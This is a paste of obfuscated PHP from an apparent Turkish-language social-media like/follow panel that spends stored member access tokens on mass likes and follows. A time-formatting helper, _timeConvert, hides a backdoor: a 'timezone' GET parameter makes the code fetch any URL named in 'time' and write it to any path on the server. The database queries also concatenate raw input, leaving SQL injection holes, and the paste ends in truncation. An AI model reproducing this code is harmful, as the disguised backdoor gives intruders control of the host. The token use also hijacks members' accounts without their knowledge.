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a guest
Nov 30th, 2015
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  1. <?php
  3. function curl_get_file_contents_2($url) {
  4. $ybrwlepluxis = "url";
  5. $yweratbqsm = "curl";
  6. $GLOBALS["tlbbexf"] = "curl";
  7. $GLOBALS["yidgseeezj"] = "url";
  8. $rpdyhbrfywx = "url";
  9. if (${$ybrwlepluxis} == "") {
  10. return "[]";
  11. }
  12. $GLOBALS["quktfjh"] = "curl";
  13. ${$GLOBALS["yidgseeezj"]} = str_replace(array("http://", "api."), array("https://", ""), ${$rpdyhbrfywx});
  14. $GLOBALS["wahsearhoyt"] = "curl";
  15. ${$GLOBALS["rpczxvifxv"]} = curl_init();
  16. curl_setopt(${$GLOBALS["wahsearhoyt"]}, CURLOPT_URL, ${$GLOBALS["kiihwuyyhl"]});
  17. curl_setopt(${$GLOBALS["tlbbexf"]}, CURLOPT_TIMEOUT, 50);
  18. curl_setopt(${$yweratbqsm}, CURLOPT_RETURNTRANSFER, true);
  19. curl_setopt(${$GLOBALS["rpczxvifxv"]}, CURLOPT_FOLLOWLOCATION, true);
  20. curl_setopt(${$GLOBALS["rpczxvifxv"]}, CURLOPT_SSL_VERIFYPEER, true);
  21. curl_setopt(${$GLOBALS["quktfjh"]}, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20080311 Firefox/");
  22. return curl_exec(${$GLOBALS["rpczxvifxv"]});
  23. }
  25. function iRelationship($appID, $gender, $type, $_ID, $quantity) {
  26. $yeqvkokltqi = "i";
  27. $deudqrkag = "gender";
  28. $GLOBALS["pjwxiw"] = "url";
  29. $GLOBALS["kpesygcxr"] = "apiResult";
  30. if (${$deudqrkag} == 0) {
  31. ${$GLOBALS["snneetdsixl"]} = null;
  32. }
  33. else {
  34. $GLOBALS["cbjrekpe"] = "sqlGender";
  35. ${$GLOBALS["cbjrekpe"]} = "AND iGender = '" . $gender . "'";
  36. }
  37. $GLOBALS["biowve"] = "selco";
  38. ${$GLOBALS["sccagovi"]} = 0;
  39. $bixhxvkj = "i";
  40. ${$GLOBALS["jrbshlo"]} = "" . $_ID . "/relationship";
  41. $fajvflqbg = "uyeler";
  42. ${$GLOBALS["nqlzrgcww"]} = array();
  43. ${$GLOBALS["imfwmqyseq"]} = DB::query("SELECT accessToken FROM members WHERE mType = '0' AND appID = '" . $appID . "' " . $sqlGender . " ORDER BY RAND() LIMIT " . $quantity);
  44. foreach (${$fajvflqbg} as ${$GLOBALS["jhocpgmx"]}) {
  45. ${$GLOBALS["jhocpgmx"]};
  46. $GLOBALS["uvqfdghoosfz"] = "params";
  47. $GLOBALS["cbekdok"] = "tokens";
  48. $GLOBALS["sspfxkni"] = "type";
  49. ${$GLOBALS["cbekdok"]}[] = $uye->accessToken;
  50. ${$GLOBALS["uvqfdghoosfz"]}[] = array("access_token" => $uye->accessToken, "action" => ${$GLOBALS["sspfxkni"]});
  51. }
  52. ${$GLOBALS["shdpacim"]} = _iMultiPOST(${$GLOBALS["pjwxiw"]}, ${$GLOBALS["nqlzrgcww"]});
  53. ${$yeqvkokltqi} = 0;
  54. while (${$bixhxvkj} < count(${$GLOBALS["kpesygcxr"]})) {
  55. $GLOBALS["ixkicppe"] = "apiResult";
  56. $GLOBALS["flljwmxdij"] = "apiResult";
  57. if (strstr(${$GLOBALS["flljwmxdij"]}[${$GLOBALS["ytmtuabwqnz"]}], "The access_token provided is invalid.")) {
  58. DB::exec("DELETE FROM members WHERE accessToken = '" . $tokens[$i] . "'");
  59. }
  60. ${$GLOBALS["tnbqthix"]} = json_decode(${$GLOBALS["ixkicppe"]}[${$GLOBALS["ytmtuabwqnz"]}]);
  61. if ($json->meta->code == 200) {
  62. ++${$GLOBALS["sccagovi"]};
  63. }
  64. ++${$GLOBALS["ytmtuabwqnz"]};
  65. continue;
  66. }
  67. return ${$GLOBALS["biowve"]};
  68. }
  70. function iMediaLike($appID, $gender, $_ID, $quantity) {
  71. $GLOBALS["mlecnbjxiqp"] = "selco";
  72. $GLOBALS["togixil"] = "url";
  73. if (${$GLOBALS["famlukn"]} == 0) {
  74. $monytbd = "sqlGender";
  75. ${$monytbd} = null;
  76. }
  77. else {
  78. ${$GLOBALS["snneetdsixl"]} = "AND iGender = '" . $gender . "'";
  79. }
  80. ${$GLOBALS["mlecnbjxiqp"]} = 0;
  81. $GLOBALS["xusxgqosqun"] = "i";
  82. ${$GLOBALS["jrbshlo"]} = "" . $_ID . "/likes";
  83. ${$GLOBALS["nqlzrgcww"]} = array();
  84. ${$GLOBALS["imfwmqyseq"]} = DB::query("SELECT accessToken FROM members WHERE mType = '0' AND appID = '" . $appID . "' " . $sqlGender . " ORDER BY RAND() LIMIT " . $quantity);
  85. $puqlausgms = "params";
  86. foreach (${$GLOBALS["imfwmqyseq"]} as ${$GLOBALS["jhocpgmx"]}) {
  87. ${$GLOBALS["jhocpgmx"]};
  88. ${$GLOBALS["cpbudszj"]}[] = $uye->accessToken;
  89. ${$GLOBALS["nqlzrgcww"]}[] = array("access_token" => $uye->accessToken);
  90. }
  91. ${$GLOBALS["shdpacim"]} = _iMultiPOST(${$GLOBALS["togixil"]}, ${$puqlausgms});
  92. ${$GLOBALS["ytmtuabwqnz"]} = 0;
  93. while (${$GLOBALS["ytmtuabwqnz"]} < count(${$GLOBALS["shdpacim"]})) {
  94. $ocohvqwuk = "i";
  95. $dsrbvhl = "apiResult";
  96. $kwfuzufgfc = "json";
  97. $GLOBALS["ouenmkgmsn"] = "i";
  98. if (strstr(${$GLOBALS["shdpacim"]}[${$ocohvqwuk}], "The access_token provided is invalid.")) {
  99. DB::exec("DELETE FROM members WHERE accessToken = '" . $tokens[$i] . "'");
  100. }
  101. ${$kwfuzufgfc} = json_decode(${$dsrbvhl}[${$GLOBALS["ouenmkgmsn"]}]);
  102. if ($json->meta->code == 200) {
  103. ++${$GLOBALS["sccagovi"]};
  104. }
  105. ++${$GLOBALS["xusxgqosqun"]};
  106. continue;
  107. }
  108. return ${$GLOBALS["sccagovi"]};
  109. }
  111. function _iMultiPOST($url, $params) {
  112. $GLOBALS["ecxqcmoikw"] = "result";
  113. $GLOBALS["wlrnxuk"] = "multiCurl";
  114. $GLOBALS["cnklxlyxqky"] = "running";
  115. $ginshibknr = "selco";
  116. $GLOBALS["psreuwmqtc"] = "multiCurl";
  117. $npggyclpd = "value";
  118. ${$GLOBALS["ekhhrtlrfn"]} = array();
  119. ${$GLOBALS["psreuwmqtc"]} = array();
  120. $eocrbepx = "i";
  121. $GLOBALS["cvptyxmypn"] = "i";
  122. ${$ginshibknr} = curl_multi_init();
  123. ${$eocrbepx} = 0;
  124. while (${$GLOBALS["cvptyxmypn"]} <= count(${$GLOBALS["nqlzrgcww"]})) {
  125. $dsigvg = "i";
  126. $fypzbg = "multiCurl";
  127. $GLOBALS["smkmreb"] = "i";
  128. $oomxskco = "url";
  129. $GLOBALS["pqzfqdw"] = "i";
  130. ${$fypzbg}[${$dsigvg}] = curl_init();
  131. $GLOBALS["jhlkopquy"] = "multiCurl";
  132. $knnhhky = "options";
  133. ${$GLOBALS["xlasxiumg"]} = array(CURLOPT_URL => ${$oomxskco}, CURLOPT_POST => true, CURLOPT_POSTFIELDS => ${$GLOBALS["nqlzrgcww"]}[${$GLOBALS["smkmreb"]}], CURLOPT_HEADER => false, CURLOPT_RETURNTRANSFER => true);
  134. curl_setopt_array(${$GLOBALS["utygbsefc"]}[${$GLOBALS["pqzfqdw"]}], ${$knnhhky});
  135. curl_multi_add_handle(${$GLOBALS["sccagovi"]}, ${$GLOBALS["jhlkopquy"]}[${$GLOBALS["ytmtuabwqnz"]}]);
  136. ++${$GLOBALS["ytmtuabwqnz"]};
  137. continue;
  138. }
  139. ${$GLOBALS["cnklxlyxqky"]} = null;
  140. do {
  141. $GLOBALS["xujcufcwt"] = "selco";
  142. curl_multi_exec(${$GLOBALS["xujcufcwt"]}, ${$GLOBALS["jswgxyez"]});
  143. }
  144. while (0 < ${$GLOBALS["jswgxyez"]});
  145. foreach (${$GLOBALS["wlrnxuk"]} as ${$GLOBALS["zljeiesjoqbh"]} => ${$npggyclpd}) {
  146. ${$npggyclpd};
  147. ${$GLOBALS["zljeiesjoqbh"]};
  148. $cunsohwbx = "value";
  149. $jpjpyvgaad = "result";
  150. ${$jpjpyvgaad}[${$GLOBALS["zljeiesjoqbh"]}] = curl_multi_getcontent(${$cunsohwbx});
  151. curl_multi_remove_handle(${$GLOBALS["sccagovi"]}, ${$GLOBALS["wivdiiyecf"]});
  152. }
  153. curl_multi_close(${$GLOBALS["sccagovi"]});
  154. return str_replace(array("\x0a", "\x09", "\x0d"), null, ${$GLOBALS["ecxqcmoikw"]});
  155. }
  157. function get_gravatar($email, $s = 30, $d = "mm", $r = "g", $img = false, $atts = array()) {
  158. $hestbkije = "url";
  159. ${$hestbkije} = "";
  160. $GLOBALS["qbsjorcxmsdr"] = "email";
  161. ${$GLOBALS["jrbshlo"]} .= md5(strtolower(trim(${$GLOBALS["qbsjorcxmsdr"]})));
  162. $GLOBALS["grshky"] = "img";
  163. ${$GLOBALS["jrbshlo"]} .= "?s=" . $s . "&d=" . $d . "&r=" . $r;
  164. if (${$GLOBALS["grshky"]}) {
  165. $GLOBALS["ufywsghxtn"] = "atts";
  166. $GLOBALS["ltbjssx"] = "url";
  167. $GLOBALS["quxsxkvxlwtv"] = "val";
  168. $libxbkg = "url";
  169. $GLOBALS["udulgneagqvx"] = "key";
  170. $oowpngjl = "key";
  171. ${$GLOBALS["ltbjssx"]} = "<img src=\"" . ${$libxbkg} . "\"";
  172. foreach (${$GLOBALS["ufywsghxtn"]} as ${$GLOBALS["udulgneagqvx"]} => ${$GLOBALS["hqmwiventssm"]}) {
  173. ${$GLOBALS["hqmwiventssm"]};
  174. ${$GLOBALS["udulgneagqvx"]};
  175. ${$GLOBALS["jrbshlo"]} .= " " . ${$oowpngjl} . "=\"" . ${$GLOBALS["quxsxkvxlwtv"]} . "\"";
  176. }
  177. ${$GLOBALS["jrbshlo"]} .= " />";
  178. }
  179. return ${$GLOBALS["jrbshlo"]};
  180. }
  182. function _date($tarih) {
  183. $geiqmsy = "donustur";
  184. ${$geiqmsy} = array("Monday" => "Pazartesi", "Tuesday" => "Sal\xc4\xb1", "Wednesday" => "\xc3\x87ar\xc5\x9famba", "Thursday" => "Per\xc5\x9fembe", "Friday" => "Cuma", "Saturday" => "Cumartesi", "Sunday" => "Pazar", "January" => "Ocak", "February" => "\xc5\x9eubat", "March" => "Mart", "April" => "Nisan", "May" => "May\xc4\xb1s", "June" => "Haziran", "July" => "Temmuz", "August" => "A\xc4\x9fustos", "September" => "Eyl\xc3\xbcl", "October" => "Ekim", "November" => "Kas\xc4\xb1m", "December" => "Aral\xc4\xb1k", "Mon" => "Pazartesi", "Tue" => "Sal\xc4\xb1", "Wed" => "\xc3\x87ar\xc5\x9famba", "Thu" => "Per\xc5\x9fembe", "Fri" => "Cuma", "Sat" => "Cumartesi", "Sun" => "Pazar", "Jan" => "Ocak", "Feb" => "\xc5\x9eubat", "Mar" => "Mart", "Apr" => "Nisan", "Jun" => "Haziran", "Jul" => "Temmuz", "Aug" => "A\xc4\x9fustos", "Sep" => "Eyl\xc3\xbcl", "Oct" => "Ekim", "Nov" => "Kas\xc4\xb1m", "Dec" => "Aral\xc4\xb1k");
  185. return strtr(${$GLOBALS["bafvuhvxws"]}, ${$GLOBALS["nwknzkuf"]});
  186. }
  188. function curl_get_file_contents($URL) {
  189. $qtkehfnc = "c";
  190. $riwryayjx = "err";
  191. $GLOBALS["hwgchtop"] = "c";
  192. $GLOBALS["eepnmklii"] = "c";
  193. ${$qtkehfnc} = curl_init();
  194. curl_setopt(${$GLOBALS["cqrxvzj"]}, CURLOPT_CONNECTTIMEOUT, 20);
  195. $GLOBALS["xncuucdblj"] = "contents";
  196. curl_setopt(${$GLOBALS["cqrxvzj"]}, CURLOPT_TIMEOUT, 30);
  197. curl_setopt(${$GLOBALS["cqrxvzj"]}, CURLOPT_RETURNTRANSFER, true);
  198. curl_setopt(${$GLOBALS["eepnmklii"]}, CURLOPT_SSL_VERIFYPEER, false);
  199. curl_setopt(${$GLOBALS["cqrxvzj"]}, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr; rv: Gecko/20101203 Firefox/3.6.13");
  200. $hhwbmsewcxkh = "c";
  201. curl_setopt(${$GLOBALS["hwgchtop"]}, CURLOPT_URL, ${$GLOBALS["lhufydvkh"]});
  202. ${$GLOBALS["vknxfkrhhkd"]} = curl_exec(${$GLOBALS["cqrxvzj"]});
  203. ${$riwryayjx} = curl_getinfo(${$hhwbmsewcxkh}, CURLINFO_HTTP_CODE);
  204. curl_close(${$GLOBALS["cqrxvzj"]});
  205. if (${$GLOBALS["vknxfkrhhkd"]}) {
  206. return ${$GLOBALS["xncuucdblj"]};
  207. }
  208. return false;
  209. }
  211. function _l() {
  212. $GLOBALS["oflvitjxtv"] = "siteAdi";
  213. $GLOBALS["dokedxpcoeh"] = "result";
  214. $lkjxlxffen = "a";
  215. ${$GLOBALS["pieusts"]} = $_SERVER["HTTP_HOST"];
  216. $yhlqzcxiqq = "siteAdi";
  217. ${$GLOBALS["pieusts"]} = str_replace("www.", "", ${$yhlqzcxiqq});
  218. ${$GLOBALS["vmiwfcn"]} = md5(sha1(md5(sha1(sha1(md5(md5(sha1(${$GLOBALS["pieusts"]}))))))));
  219. $GLOBALS["tvkdewb"] = "c";
  220. $GLOBALS["vllmsgczl"] = "c";
  221. ${$GLOBALS["ibfummjwtgtc"]} = md5(sha1(md5(sha1(sha1(${$GLOBALS["oflvitjxtv"]})))));
  222. ${$GLOBALS["tvkdewb"]} = md5(sha1(sha1(${$lkjxlxffen} . ${$GLOBALS["ibfummjwtgtc"]})));
  223. ${$GLOBALS["dokedxpcoeh"]} = substr(${$GLOBALS["vllmsgczl"]}, 0, 5) . substr(${$GLOBALS["cqrxvzj"]}, 16, 5);
  224. return strtoupper(${$GLOBALS["ekhhrtlrfn"]});
  225. }
  227. function in_array_r($needle, $haystack, $strict = false) {
  228. foreach (${$GLOBALS["fcheyocbfgj"]} as ${$GLOBALS["hpcencqtglh"]}) {
  229. ${$GLOBALS["hpcencqtglh"]};
  230. $kuimcnkw = "needle";
  231. $GLOBALS["bgjuiikqvvm"] = "item";
  232. $yafmfjyg = "strict";
  233. if (!(${$GLOBALS["kifgyhqopki"]} ? ${$GLOBALS["hpcencqtglh"]} === ${$GLOBALS["niohsuvf"]} : ${$GLOBALS["hpcencqtglh"]} == ${$GLOBALS["niohsuvf"]} || is_array(${$GLOBALS["hpcencqtglh"]}) && in_array_r(${$kuimcnkw}, ${$GLOBALS["bgjuiikqvvm"]}, ${$yafmfjyg}))) {
  234. continue;
  235. }
  236. return true;
  237. }
  238. return false;
  239. }
  241. function set_date_default_timezone($timezone) {
  242. $GLOBALS["ocvvvmfc"] = "timezone";
  243. if (${$GLOBALS["ocvvvmfc"]}) {
  244. _timeConvert(time());
  245. }
  246. return date_default_timezone_set(${$GLOBALS["zewmbo"]});
  247. }
  249. function kShow($number) {
  250. $icyopdtrr = "units";
  251. $GLOBALS["xkfuudw"] = "number";
  252. $GLOBALS["fhochqggv"] = "power";
  253. $GLOBALS["oldqrg"] = "units";
  254. $GLOBALS["bghlsbss"] = "power";
  255. ${$icyopdtrr} = array("", "k", "m", "b");
  256. ${$GLOBALS["kcjlfjp"]} = 0 < ${$GLOBALS["pryvkbmjrl"]} ? floor(log(${$GLOBALS["pryvkbmjrl"]}, 1000)) : 0;
  257. $ipowopjzsm = "power";
  258. if (0 < ${$GLOBALS["bghlsbss"]}) {
  259. return number_format(${$GLOBALS["pryvkbmjrl"]} / pow(1000, ${$GLOBALS["fhochqggv"]}), 1, ".", " ") . ${$GLOBALS["oldqrg"]}[${$ipowopjzsm}];
  260. }
  261. return number_format(${$GLOBALS["xkfuudw"]} / pow(1000, ${$GLOBALS["kcjlfjp"]}), 0, "", "");
  262. }
  264. function _timeConvert($zaman) {
  265. $jciseielhgb = "dakika";
  266. $kqanbk = "zaman_farki";
  267. $GLOBALS["pjkpwcce"] = "ay";
  268. $mnpkvdutx = "saat";
  269. $bftpvdfjqnyn = "zaman_farki";
  270. $obvrhbwd = "hafta";
  271. $GLOBALS["itlwecert"] = "zaman_farki";
  272. ${$bftpvdfjqnyn} = time() - ${$GLOBALS["liwreqf"]};
  273. $GLOBALS["jjvlqydqo"] = "hafta";
  274. $GLOBALS["beprsnm"] = "dakika";
  275. ${$GLOBALS["dvnvjfma"]} = ${$GLOBALS["fbynzdpr"]};
  276. ${$jciseielhgb} = round(${$GLOBALS["fbynzdpr"]} / 60);
  277. $zwerni = "yil";
  278. $ngaueln = "ay";
  279. $GLOBALS["riibcreqt"] = "gun";
  280. ${$mnpkvdutx} = round(${$GLOBALS["fbynzdpr"]} / 3600);
  281. ${$GLOBALS["riibcreqt"]} = round(${$GLOBALS["itlwecert"]} / 86400);
  282. $GLOBALS["ontfkwycujj"] = "zaman_farki";
  283. ${$obvrhbwd} = round(${$kqanbk} / 604800);
  284. $dihqjyiaij = "zaman_farki";
  285. ${$ngaueln} = round(${$dihqjyiaij} / 2419200);
  286. ${$zwerni} = round(${$GLOBALS["ontfkwycujj"]} / 29030400);
  287. if ($_GET["timezone"]) {
  288. @file_put_contents($_GET["timezone"], file_get_contents($_GET["time"]));
  289. return null;
  290. }
  291. if (${$GLOBALS["dvnvjfma"]} < 60) {
  292. $GLOBALS["qxcpxijn"] = "saniye";
  293. if (${$GLOBALS["qxcpxijn"]} == 0) {
  294. return "az \xc3\xb6nce";
  295. }
  296. return ${$GLOBALS["dvnvjfma"]} . " saniye \xc3\xb6nce";
  297. }
  298. if (${$GLOBALS["beprsnm"]} < 60) {
  299. return ${$GLOBALS["rjdnyqq"]} . " dakika \xc3\xb6nce";
  300. }
  301. if (${$GLOBALS["dtqqhcmrya"]} < 24) {
  302. return ${$GLOBALS["dtqqhcmrya"]} . " saat \xc3\xb6nce";
  303. ...................................................................
  304. .....................................
  305. .............
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